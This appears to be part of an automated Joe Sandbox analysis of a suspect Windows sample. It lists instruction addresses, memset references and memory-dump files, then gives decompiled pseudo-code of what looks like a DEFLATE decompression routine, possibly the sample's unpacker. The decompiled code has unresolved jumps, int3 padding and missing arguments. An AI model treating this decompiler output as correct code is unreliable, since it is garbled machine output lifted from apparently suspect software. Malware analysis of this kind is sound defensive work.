0x002a5d45
0x002a5d48
0x002a5d4a
0x002a5d51
0x002a5d5c
0x002a5d5c
0x002a5d5f
0x002a5d66
0x002a5d6d
0x002a5d70
0x002a5d76
0x002a5d76
0x002a5d80
0x002a5d80
0x002a5d85
0x002a5d85
0x002a5d89
0x002a5d8c
0x002a5d8e
0x002a5d94
0x002a5d94
0x002a5d9b
0x002a5d9f
0x002a5da6
0x002a5da9
0x002a5dab
0x00000000
0x002a5db0
0x002a5db0
0x002a5dbb
0x002a5dbe
0x002a5dbf
0x002a5dc1
0x002a5dc4
0x002a5dc4
0x002a5dc8
0x002a5dc8
0x002a5dcb
0x002a5dcb
0x002a5dce
0x002a5e1d
0x002a5e2d
0x002a5e30
0x002a5e33
0x002a5e36
0x002a5e39
0x002a5e3c
0x002a5e3e
0x002a5e43
0x002a5e46
0x002a5e48
0x002a5e48
0x002a5e4b
0x002a5e4e
0x002a5e4e
0x002a5e51
0x002a5e51
0x002a5e54
0x002a5e57
0x002a5e59
0x002a5e59
0x002a5e59
0x002a5e5c
0x002a5e5f
0x002a5e62
0x002a5e62
0x002a5e62
0x002a5e70
0x002a5e75
0x002a5e79
0x002a5e7c
0x002a5e94
0x002a5e7e
0x002a5e81
0x002a5e85
0x002a5e88
0x002a5e8a
0x002a5e8d
0x002a5e90
0x002a5e90
0x002a5e97
0x002a5e97
0x002a5e97
0x002a5e97
0x002a5e97
0x002a5e9c
0x002a5e9f
0x002a5e9f
0x002a5ea1
0x002a5ea6
0x002a5ea6
0x002a5eab
0x002a5dd0
0x002a5dd0
0x002a5dd7
0x002a5dda
0x002a5ddd
0x002a5de3
0x002a5de9
0x002a5de9
0x002a5dee
0x002a5def
0x002a5df0
0x002a5df1
0x002a5df1
0x002a5df6
0x002a5dff
0x002a5dff
0x002a5e05
0x002a5e05
0x002a5e05
0x002a5e08
0x002a5e0a
0x002a5e0d
0x002a5e0d
0x002a5e15
0x002a5e15
0x002a5de3
0x002a5dce
0x002a5eb3
0x002a5eb3
0x002a5eb6
0x002a5eb7
0x002a5eb7
0x002a5ec1
0x002a5ec6
0x002a5ec6
0x002a5ec7
0x002a5ec7
0x002a5ecb
0x002a60e6
0x002a60e6
0x00000000
0x002a5ed1
0x002a5ed1
0x002a5ed1
0x002a5ed1
0x002a5ed3
0x002a5ed3
0x002a5ed3
0x002a5ed6
0x002a5ed6
0x002a5edc
0x002a5edf
0x002a5ee1
0x00000000
0x00000000
0x002a5ee7
0x002a5ee7
0x002a5eea
0x002a5fa2
0x002a5fa9
0x002a5fb1
0x002a5fb4
0x002a5fb6
0x002a5fc7
0x00000000
0x002a5fd0
0x002a5fd0
0x002a5fd0
0x002a5fd5
0x002a5fd7
0x002a5fde
0x002a5fe6
0x002a5fe9
0x002a5fe9
0x002a5fb8
0x002a5fb8
0x002a5fba
0x002a5fbd
0x002a5fc2
0x002a5fc2
0x002a5fed
0x002a5fed
0x002a5fef
0x002a5ff1
0x002a5ff4
0x002a5ff7
0x002a5ffa
0x002a600c
0x002a600c
0x002a601c
0x002a601c
0x002a6023
0x002a6026
0x002a6028
0x002a6050
0x002a605e
0x002a6061
0x002a6068
0x002a606b
0x002a606d
0x002a6071
0x002a6074
0x002a6077
0x002a6083
0x002a6083
0x002a6079
0x002a6079
0x002a6079
0x002a6085
0x002a6090
0x002a6099
0x002a609c
0x002a609e
0x002a5ed3
0x002a5ed3
0x00000000
0x002a602a
0x002a602a
0x002a602a
0x002a602a
0x002a602d
0x00000000
0x00000000
0x002a6033
0x002a6038
0x002a603a
0x002a603b
0x002a603e
0x002a6040
0x002a6043
0x002a6046
0x002a6049
0x002a604b
0x00000000
0x002a604d
0x002a604d
0x002a604d
0x00000000
0x002a604d
0x00000000
0x002a604b
0x002a62a6
0x002a62a6
0x00000000
0x002a62a6
0x002a600e
0x002a600e
0x002a600e
0x002a6011
0x002a6013
0x002a6388
0x002a6388
0x002a638b
0x00000000
0x002a6019
0x002a6019
0x002a6019
0x00000000
0x002a6019
0x002a6013
0x002a5ffc
0x002a5ffc
0x002a5ffc
0x002a5fff
0x002a6006
0x00000000
0x002a6006
0x002a5ef0
0x002a5ef0
0x002a5ef5
0x002a5ef8
0x002a5f7e
0x002a5f7e
0x002a5f85
0x002a5f88
0x002a5f8d
0x002a5f93
0x002a5f96
0x002a5f99
0x002a5f99
0x002a5f9c
0x00000000
0x002a5efe
0x002a5efe
0x002a5efe
0x002a5f00
0x002a5f05
0x002a5f0d
0x002a5f0f
0x002a5f22
0x002a5f22
0x002a5f25
0x00000000
0x002a5f27
0x002a5f27
0x002a5f2c
0x002a5f2c
0x002a5f30
0x002a5f30
0x002a5f3e
0x002a5f49
0x002a5f4a
0x002a5f4d
0x002a5f4f
0x00000000
0x00000000
0x002a5f51
0x002a5f51
0x002a5f54
0x002a5f56
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5f56
0x00000000
0x002a5f30
0x002a5f11
0x002a5f11
0x002a5f11
0x002a5f14
0x002a5f16
0x002a5f58
0x002a5f58
0x002a5f5b
0x002a5f5b
0x002a5f5e
0x002a629b
0x002a629b
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5f18
0x002a5f18
0x002a5f18
0x002a5f1a
0x002a5f9f
0x002a5f9f
0x00000000
0x002a5f20
0x002a5f20
0x00000000
0x002a5f20
0x002a5f1a
0x002a5f16
0x00000000
0x002a5f64
0x002a5f67
0x002a5f69
0x002a5f6b
0x002a5f6c
0x002a5f6e
0x002a5f71
0x002a5f74
0x002a5f77
0x002a5f77
0x00000000
0x002a5f7c
0x002a5ef8
0x00000000
0x002a5eea
0x002a60a6
0x002a60a9
0x002a60ac
0x002a60ae
0x002a60b0
0x002a6396
0x002a6396
0x002a6399
0x00000000
0x002a60b6
0x002a60b6
0x002a60c2
0x002a60d3
0x002a60d3
0x002a60dd
0x002a60e3
0x00000000
0x002a60e3
0x00000000
0x002a60b0
0x002a5ed3
0x002a5d53
0x002a5d53
0x002a5d53
0x002a5d56
0x002a6376
0x002a6376
0x002a637d
0x00000000
0x00000000
0x00000000
0x00000000
0x002a5d56
0x00000000
0x002a5d51

APIs

memset.NTDLL ref: 002A5BDE
memset.NTDLL ref: 002A5C6D
memset.NTDLL ref: 002A5C83
memset.NTDLL ref: 002A5C99

Memory Dump Source

Source File: 00000008.00000002.1686365034.002A1000.00000020.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000008.00000002.1686360890.002A0000.00000004.sdmp Download File
Associated: 00000008.00000002.1686374589.002B1000.00000002.sdmp Download File
Associated: 00000008.00000002.1686378808.002B2000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2a0000_startedradar.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 5b4c4f5f33b88d9335d1e9d03b671fb4d283313ad2b17bc54525a77bff84ac1b
Instruction ID: 01497c5250977107410775f05ef6b1b13f23080b56f11a41be0b53b75e39dcbb
Opcode Fuzzy Hash: 5b4c4f5f33b88d9335d1e9d03b671fb4d283313ad2b17bc54525a77bff84ac1b
Instruction Fuzzy Hash: DF3105B1E10A25EFDB08CFA4C885BADBBB5FF49310F14416AE512AB680D774A650CF94

Uniqueness

Uniqueness Score: 0.00%

Function 002A5A85, Relevance: 5.1, APIs: 4, Instructions: 79
COMMON

C-Code - Quality: 68%

			E002A5A85(void* __eax, void* __ebx, void* __edi) {
				intOrPtr* _t597;
				void* _t598;
				signed int _t600;
				signed int _t603;
				signed int _t605;
				void* _t608;
				signed int _t609;
				signed int _t612;
				signed int _t614;
				signed int _t617;
				signed int _t618;
				signed int _t624;
				signed int _t625;
				void* _t628;
				signed int _t630;
				void* _t631;
				signed int _t641;
				signed int* _t651;
				signed int _t654;
				signed int _t671;
				signed int _t673;
				signed int _t675;
				signed int _t685;
				signed int _t688;
				signed int _t689;
				signed int _t690;
				signed int _t695;
				unsigned int _t698;
				void* _t699;
				signed int _t707;
				signed int _t710;
				signed int _t721;
				signed int _t725;
				signed int _t727;
				void* _t730;
				signed int _t732;
				signed int _t733;
				intOrPtr _t734;
				signed char _t738;
				intOrPtr* _t740;
				void* _t741;
				signed int _t749;
				signed int _t753;
				signed int _t758;
				signed int _t764;
				signed int _t767;
				void* _t769;
				intOrPtr _t782;
				intOrPtr _t783;
				intOrPtr _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t802;
				signed int _t804;
				signed int _t808;
				signed int _t812;
				signed int _t815;
				signed int _t819;
				void* _t824;
				signed int _t828;
				void* _t829;
				signed int _t834;
				void* _t835;
				void* _t836;
				signed int _t841;
				signed int _t842;
				signed char _t844;
				signed int _t845;
				void* _t847;
				void* _t851;
				signed int _t853;
				intOrPtr _t854;
				signed char _t860;
				signed int _t861;
				signed int _t862;
				signed char _t863;
				signed char _t864;
				intOrPtr _t866;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t874;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				signed char _t894;
				signed int _t896;
				void* _t897;
				void* _t898;
				signed int _t901;
				signed int _t902;
				signed char _t903;
				intOrPtr _t905;
				intOrPtr _t907;
				void* _t910;
				signed char _t911;
				signed char _t912;
				signed char _t913;
				signed int _t917;
				signed char _t922;
				void* _t923;
				void* _t924;
				signed int _t927;
				signed char* _t932;
				signed int _t936;
				signed char _t940;
				signed int _t941;
				signed char _t944;
				signed int _t945;
				void* _t953;
				signed int _t968;
				signed int _t969;
				signed int _t972;
				signed int _t974;
				signed int _t978;
				signed int* _t979;
				signed char* _t984;
				void* _t985;
				void* _t990;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1000;
				signed int _t1003;
				signed int _t1004;
				int _t1005;
				int _t1007;
				signed int _t1008;
				unsigned int _t1011;
				void* _t1015;
				intOrPtr _t1016;
				signed int _t1017;
				signed int _t1021;
				signed char _t1025;
				void* _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1039;
				void* _t1041;
				int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed char _t1064;
				void* _t1065;
				void* _t1067;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t597 = __eax + 1 - 0x20;
					 *_t597 =  *_t597 + _t597;
					_t847 = __ebx + _t597;
					_t598 = _t597 + 1;
					 *_t598 =  *_t598 ^ _t598;
					 *_t598 = _t598 +  *_t598;
					 *0xde0 =  *0xde0 + _t598;
					memset(_t598, ??, ??);
					asm("movdqa xmm0, [0x2b1ae0]");
					_t1068 = _t1067 + 0xc;
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqu [edi+0x70], xmm0");
					asm("movdqu [edi+0x80], xmm0");
					asm("movdqu [edi+0x90], xmm0");
					asm("movdqu [edi+0xa0], xmm0");
					asm("movdqu [edi+0xb0], xmm0");
					asm("movdqu [edi+0xc0], xmm0");
					_t1029 = __edi + 0xd0;
					asm("movdqa xmm0, [0x2b1af0]");
					asm("movdqu [edi], xmm0");
					asm("movdqu [edi+0x10], xmm0");
					asm("movdqu [edi+0x20], xmm0");
					asm("movdqu [edi+0x30], xmm0");
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqa xmm0, [0x2b1ad0]");
					asm("movdqu [edi+0x70], xmm0");
					asm("movq [edi+0x80], xmm0");
					 *((intOrPtr*)(_t1029 + 0x88)) = 0x8080808;
					 *((intOrPtr*)(_t1029 + 0x8c)) = 0x8080808;
					_t1030 =  *(_t1065 - 0x14);
					while(1) {
						L141:
						_t600 =  *(_t1030 + 0x18);
						if(_t600 >= 0) {
							break;
						}
						L218:
						_t968 =  *(_t1065 - 4);
						while(1) {
							L39:
							_t860 =  *(_t1065 - 0x20) - _t847;
							__eflags = _t860 - 4;
							if(_t860 < 4) {
								goto L58;
							}
							L40:
							_t1030 =  *(_t1065 - 0x14);
							__eflags =  *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) - 2;
							if( *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1050 - 0xf;
								if(_t1050 < 0xf) {
									_t1017 =  *(_t847 + 1) & 0x000000ff;
									_t860 = _t1050;
									_t733 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1017 << 0x00000008 | _t733) << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
								}
								_t618 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t618;
								__eflags = _t618;
								if(_t618 < 0) {
									L45:
									goto 0x5a1333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t685 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t618 = (_t685 & 0x00000001) +  !_t847;
										_t847 =  *((short*)(_t1030 + 0x960 + _t618 * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L44:
									_t860 = _t618 >> 9;
								}
								L48:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 & 0x00000100;
								if((_t861 & 0x00000100) != 0) {
									L84:
									_t862 = _t861 & 0x000001ff;
									 *(_t1065 - 8) = _t862;
									__eflags = _t862 - 0x100;
									if(_t862 != 0x100) {
										L219:
										_t608 = _t862 * 4 - 0x404;
										_t863 =  *(_t608 + 0x2b1010);
										_t609 =  *(_t608 + 0x2b1a48);
										 *(_t1065 - 0x38) = _t863;
										 *(_t1065 - 8) = _t609;
										__eflags = _t863;
										if(_t863 == 0) {
											L225:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L3:
												_t612 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
												 *(_t1065 - 0x1c) = _t612;
												__eflags = _t612;
												if(_t612 < 0) {
													L5:
													goto 0x5a12ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t614 = _t968 >> _t863;
														_t863 = _t863 + 1;
														_t847 =  *((short*)(_t1030 + 0x1700 + ((_t614 & 0x00000001) +  !_t847) * 2));
														__eflags = _t847;
													} while (_t847 < 0);
													 *(_t1065 - 0x1c) = _t847;
													_t847 =  *(_t1065 - 0x18);
													_t617 =  *(_t1065 - 0x1c);
												} else {
													L4:
													_t863 = _t612 >> 9;
													_t617 = _t612 & 0x000001ff;
												}
												L9:
												_t968 = _t968 >> _t863;
												_t1050 = _t1050 - _t863;
												_t864 =  *(0x2b1090 + _t617 * 4);
												_t618 =  *(0x2b1110 + _t617 * 4);
												 *(_t1065 - 4) = _t968;
												 *(_t1065 - 0x38) = _t864;
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t864;
												if(_t864 == 0) {
													L15:
													_t866 =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 + 0xc));
													 *((intOrPtr*)(_t1065 - 0x48)) = _t866;
													__eflags = _t618 - _t866;
													if(_t618 <= _t866) {
														L17:
														_t1030 =  *(_t1065 - 0x14);
														_t869 = (_t866 - _t618 &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc));
														__eflags =  *(_t1065 - 0x10) - _t869;
														 *(_t1065 - 0xc) = _t869;
														_t620 =  >  ?  *(_t1065 - 0x10) : _t869;
														_t870 =  *(_t1065 - 8);
														_t621 = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870;
														__eflags = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870 -  *((intOrPtr*)(_t1065 - 0x40));
														if(( >  ?  *(_t1065 - 0x10) : _t869) + _t870 <=  *((intOrPtr*)(_t1065 - 0x40))) {
															L21:
															__eflags = _t870 - 9;
															if(_t870 < 9) {
																L30:
																goto 0x5a12f7;
																asm("int3");
																do {
																	L32:
																	_t870 = _t870 - 3;
																	 *_t1030 =  *_t968 & 0x000000ff;
																	 *((char*)(_t1030 + 1)) =  *(_t968 + 1) & 0x000000ff;
																	_t624 =  *(2 + _t968) & 0x000000ff;
																	_t968 = _t968 + 3;
																	 *(2 + _t1030) = _t624;
																	_t1030 = _t1030 + 3;
																	__eflags = _t870 - 2;
																} while (_t870 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t870 -  *(_t1065 - 0x28);
																if(_t870 >  *(_t1065 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1041 =  *(_t1065 - 0xc);
																	_t871 =  *(_t1065 - 0x10);
																	_t738 = _t1041 + (_t870 & 0xfffffff8);
																	 *(_t1065 - 0x24) = _t738;
																	_t1025 = _t738;
																	do {
																		L24:
																		 *_t871 =  *_t1041;
																		_t740 =  *((intOrPtr*)(_t1041 + 4));
																		_t1041 = _t1041 + 8;
																		 *((intOrPtr*)(_t871 + 4)) = _t740;
																		_t871 = _t871 + 8;
																		__eflags = _t1041 - _t1025;
																	} while (_t1041 < _t1025);
																	_t968 =  *(_t1065 - 4);
																	 *(_t1065 - 0x10) = _t871;
																	_t870 =  *(_t1065 - 8) & 0x00000007;
																	 *(_t1065 - 0xc) = _t1041;
																	_t1030 =  *(_t1065 - 0x14);
																	 *(_t1065 - 8) = _t870;
																	__eflags = _t870 - 3;
																	if(_t870 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t741 = _t870;
																_t870 = _t870 - 1;
																 *(_t1065 - 8) = _t870;
																__eflags = _t741;
																if(_t741 == 0) {
																	goto L39;
																}
																L19:
																__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																	L238:
																	 *(_t1065 - 0xc) = 2;
																	 *_t1030 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																	 *((intOrPtr*)(_t1065 - 0x48)) =  *((intOrPtr*)(_t1065 - 0x48)) + 1;
																	 *( *(_t1065 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1065 - 0x48)) -  *(_t1065 - 0x28) &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc))));
																	_t968 =  *(_t1065 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t860 =  *(_t1065 - 0x20) - _t847;
																__eflags = _t860 - 4;
																if(_t860 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L16:
														__eflags =  *(_t1065 + 0x18) & 0x00000004;
														if(( *(_t1065 + 0x18) & 0x00000004) != 0) {
															L270:
															_t689 = _t618 | 0xffffffff;
															 *_t1030 = 0x25;
															goto L291;
														} else {
															goto L17;
														}
													}
												} else {
													L10:
													__eflags = _t1050 - _t864;
													if(_t1050 >= _t864) {
														L13:
														_t1050 = _t1050 - _t864;
														_t749 = (_t618 << _t864) - 0x00000001 & _t968;
														_t968 = _t968 >> _t864;
														_t28 = _t1065 - 0x28;
														 *_t28 =  *(_t1065 - 0x28) + _t749;
														__eflags =  *_t28;
														_t618 =  *(_t1065 - 0x28);
														 *(_t1065 - 4) = _t968;
														goto L15;
													} else {
														while(1) {
															L11:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L12:
															_t618 = ( *_t847 & 0x000000ff) << _t1050;
															_t847 = _t847 + 1;
															_t864 =  *(_t1065 - 0x38);
															_t968 = _t968 | _t618;
															_t1050 = _t1050 + 8;
															 *(_t1065 - 0x18) = _t847;
															 *(_t1065 - 4) = _t968;
															__eflags = _t1050 - _t864;
															if(_t1050 < _t864) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														L263:
														 *_t1030 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1065 - 0x20) - _t847 - 2;
												if( *(_t1065 - 0x20) - _t847 >= 2) {
													L237:
													_t991 =  *(_t847 + 1) & 0x000000ff;
													_t753 =  *_t847 & 0x000000ff;
													_t847 = _t847 + 2;
													_t1030 =  *(_t1065 - 0x14);
													_t863 = _t1050;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) =  *(_t1065 - 4) | _t991 << _t1050 + 0x00000008 | _t753 << _t863;
													_t1050 = _t1050 + 0x10;
													_t968 =  *(_t1065 - 4);
												} else {
													do {
														L227:
														_t618 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
														 *(_t1065 - 0x24) = _t618;
														__eflags = _t618;
														if(_t618 < 0) {
															L231:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1065 - 0x1c) = _t863;
																while(1) {
																	L234:
																	_t863 =  *((short*)(_t1030 + 0x1700 + ((_t968 >> _t863 & 0x00000001) +  !( *(_t1065 - 0x24))) * 2));
																	_t764 =  *(_t1065 - 0x1c) + 1;
																	 *(_t1065 - 0x24) = _t863;
																	 *(_t1065 - 0x1c) = _t764;
																	__eflags = _t863;
																	if(_t863 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t618 = _t764 + 1;
																	__eflags = _t1050 - _t618;
																	if(_t1050 < _t618) {
																		goto L1;
																	} else {
																		L236:
																		_t863 =  *(_t1065 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t618 = _t618 >> 9;
															__eflags = _t618;
															if(_t618 == 0) {
																L1:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L264:
																	 *_t1030 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t863 = _t1050;
														_t758 = ( *_t847 & 0x000000ff) << _t863;
														_t847 = _t847 + 1;
														_t968 = _t968 | _t758;
														 *(_t1065 - 0x18) = _t847;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 4) = _t968;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1050 - _t863;
											if(_t1050 >= _t863) {
												L223:
												L224:
												_t1050 = _t1050 - _t863;
												_t767 = (_t609 << _t863) - 0x00000001 & _t968;
												_t968 = _t968 >> _t863;
												_t456 = _t1065 - 8;
												 *_t456 =  *(_t1065 - 8) + _t767;
												__eflags =  *_t456;
												 *(_t1065 - 4) = _t968;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L222:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t863 =  *(_t1065 - 0x38);
													_t968 = _t968 | _t618;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - _t863;
													if(_t1050 < _t863) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1030 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1030 + 0x14) & 0x00000001;
											if(( *(_t1030 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1050 - 3;
											if(_t1050 >= 3) {
												L89:
												_t1050 = _t1050 - 3;
												_t698 = _t968 & 0x00000007;
												_t999 = _t968 >> 3;
												 *(_t1030 + 0x14) = _t698;
												_t699 = _t698 >> 1;
												__eflags = _t699;
												 *(_t1065 - 4) = _t999;
												 *(_t1065 - 0x1c) = _t1050;
												 *(_t1030 + 0x18) = _t699;
												if(_t699 != 0) {
													L124:
													__eflags = _t699 - 3;
													if(_t699 == 3) {
														L266:
														 *(_t1065 - 0xc) = 0xffffffff;
														 *_t1030 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t699 - 1;
														if(__eflags != 0) {
															L127:
															_t901 = 0;
															__eflags = 0;
															while(1) {
																L128:
																 *(_t1065 - 8) = _t901;
																__eflags = _t901 - 3;
																if(_t901 >= 3) {
																	break;
																}
																L129:
																_t618 =  *((char*)(_t901 + 0x2b1004));
																 *(_t1065 - 0x1c) = _t618;
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	L132:
																	_t1015 = _t1030 + _t901 * 4;
																	_t1036 =  *(_t1065 - 4);
																	 *(_t1015 + 0x2c) = (0x00000001 <<  *(_t1065 - 0x1c)) - 0x00000001 & _t1036;
																	_t707 =  *(_t1065 - 8);
																	_t940 =  *((char*)(_t707 + 0x2b1004));
																	_t1037 = _t1036 >> _t940;
																	_t1050 = _t1050 - _t940;
																	_t941 = _t707;
																	 *(_t1065 - 4) = _t1037;
																	 *(_t1065 - 0x1c) = _t1050;
																	 *(_t1015 + 0x2c) =  *(_t1015 + 0x2c) +  *((intOrPtr*)(0x2b1a38 + _t941 * 4));
																	_t999 = _t1037;
																	_t1030 =  *(_t1065 - 0x14);
																	_t901 = _t941 + 1;
																	continue;
																} else {
																	while(1) {
																		L130:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L131:
																		_t710 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t901 =  *(_t1065 - 8);
																		_t999 = _t999 | _t710;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 0x18) = _t847;
																		 *(_t1065 - 4) = _t999;
																		_t618 =  *((char*)(_t901 + 0x2b1004));
																		 *(_t1065 - 0x1c) = _t618;
																		__eflags = _t1050 - _t618;
																		if(_t1050 < _t618) {
																			continue;
																		} else {
																			goto L132;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1030 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L133:
															L134:
															_t618 = memset(_t1030 + 0x1b80, 0, ??);
															_t1000 =  *(_t1065 - 4);
															_t1068 = _t1068 + 0xc;
															_t902 = 0;
															__eflags = 0;
															while(1) {
																L135:
																 *(_t1065 - 8) = _t902;
																__eflags = _t902 -  *((intOrPtr*)(_t1030 + 0x34));
																if(__eflags >= 0) {
																	break;
																}
																L136:
																__eflags = _t1050 - 3;
																if(_t1050 >= 3) {
																	L139:
																	_t936 = _t1000 & 0x00000007;
																	_t1000 = _t1000 >> 3;
																	_t1050 = _t1050 - 3;
																	 *(_t1065 - 4) = _t1000;
																	 *(_t1065 - 0x1c) = _t1050;
																	_t618 =  *( *(_t1065 - 8) + 0x2b1a24) & 0x000000ff;
																	 *(_t1030 + 0x1b80 + _t618) = _t936;
																	_t902 =  *(_t1065 - 8) + 1;
																	continue;
																} else {
																	while(1) {
																		L137:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L138:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t1000 = _t1000 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t1000;
																		__eflags = _t1050 - 3;
																		if(_t1050 < 3) {
																			continue;
																		} else {
																			goto L139;
																		}
																		goto L295;
																	}
																	L249:
																	 *_t1030 = 0xe;
																	goto L285;
																}
																goto L295;
															}
															L140:
															 *((intOrPtr*)(_t1030 + 0x34)) = 0x13;
															goto L141;
														} else {
															L126:
															goto 0x5a13af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t699 + 0x2c)) = 0x120;
															goto L0;
														}
													}
												} else {
													L90:
													_t618 = _t1050 & 0x00000007;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														L93:
														_t944 = _t1050 & 0x00000007;
														_t968 = _t999 >> _t944;
														_t1050 = _t1050 - _t944;
														 *(_t1065 - 4) = _t968;
														_t945 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1065 - 8) = _t945;
															__eflags = _t945 - 4;
															if(_t945 >= 4) {
																break;
															}
															L95:
															__eflags = _t1050;
															if(_t1050 == 0) {
																L101:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L244:
																	 *_t1030 = 7;
																	goto L285;
																} else {
																	L102:
																	_t618 =  *_t847;
																	_t847 = _t847 + 1;
																	(_t1030 + 0x2920)[_t945] = _t618;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 0x18) = _t847;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1050 - 8;
																if(_t1050 >= 8) {
																	L100:
																	(_t1030 + 0x2920)[_t945] = _t968;
																	_t1050 = _t1050 - 8;
																	_t968 = _t968 >> 8;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 4) = _t968;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L98:
